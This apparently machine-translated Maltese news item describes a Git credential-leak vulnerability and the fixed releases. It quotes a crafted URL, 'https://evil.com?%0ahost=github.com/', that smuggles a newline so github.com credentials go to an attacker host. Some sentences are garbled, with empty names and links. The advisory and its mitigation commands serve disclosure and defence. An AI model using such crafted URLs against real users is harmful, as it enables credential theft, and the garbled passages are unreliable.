rilaxxi korrettivi tas-sistema ta' kontroll tas-sors distribwit Git 2.26.1, 2.25.3, 2.24.2, 2.23.2, 2.22.3, 2.21.2, 2.20.3, 2.19.4, 2.18.3 u 2.17.4, in li eliminati () fil-handler "", li tikkawża li l-kredenzjali jintbagħtu lill-host ħażin meta klijent git jaċċessa repożitorju billi juża URL ifformattjat apposta li jkun fih karattru newline. Il-vulnerabbiltà tista 'tintuża biex tirranġa biex il-kredenzjali minn host ieħor jintbagħtu lil server ikkontrollat mill-attakkant.
Meta tispeċifika URL bħal "https://evil.com?%0ahost=github.com/", l-immaniġġjar tal-kredenzjali meta jikkonnettja mal-host evil.com se jgħaddi l-parametri ta 'awtentikazzjoni speċifikati għal github.com. Il-problema sseħħ meta jsiru operazzjonijiet bħal "git clone", inkluż l-ipproċessar tal-URLs għas-submoduli (pereżempju, "git submodule update" awtomatikament jipproċessa l-URLs speċifikati fil-fajl .gitmodules mir-repożitorju). Il-vulnerabbiltà hija l-aktar perikoluża f'sitwazzjonijiet fejn żviluppatur jikklona repożitorju mingħajr ma jara l-URL, pereżempju, meta jaħdem b'submoduli, jew f'sistemi li jwettqu azzjonijiet awtomatiċi, pereżempju, fi skripts tal-bini tal-pakketti.
Biex timblokka l-vulnerabbiltajiet f'verżjonijiet ġodda tgħaddi karattru linja ġdida fi kwalunkwe valuri trażmessi permezz tal-protokoll tal-iskambju tal-kredenzjali. Għal distribuzzjonijiet, tista 'ssegwi r-rilaxx tal-aġġornamenti tal-pakketti fuq il-paġni , , , , , , .
Bħala soluzzjoni biex timblokka l-problema Tużax credential.helper meta taċċessa repożitorji pubbliċi u tużax "git clone" fil-mod "--recurse-submodules" b'repożitorji mhux ikkontrollati. Biex tiddiżattiva kompletament il-credential.helper handler, li jagħmel u l-irkupru tal-passwords minn , protett jew fajl bil-passwords, tista' tuża l-kmandi:
git config --unset credential.helper
git config --global --unset credential.helper
git config --system --unset credential.helper
Sors: opennet.ru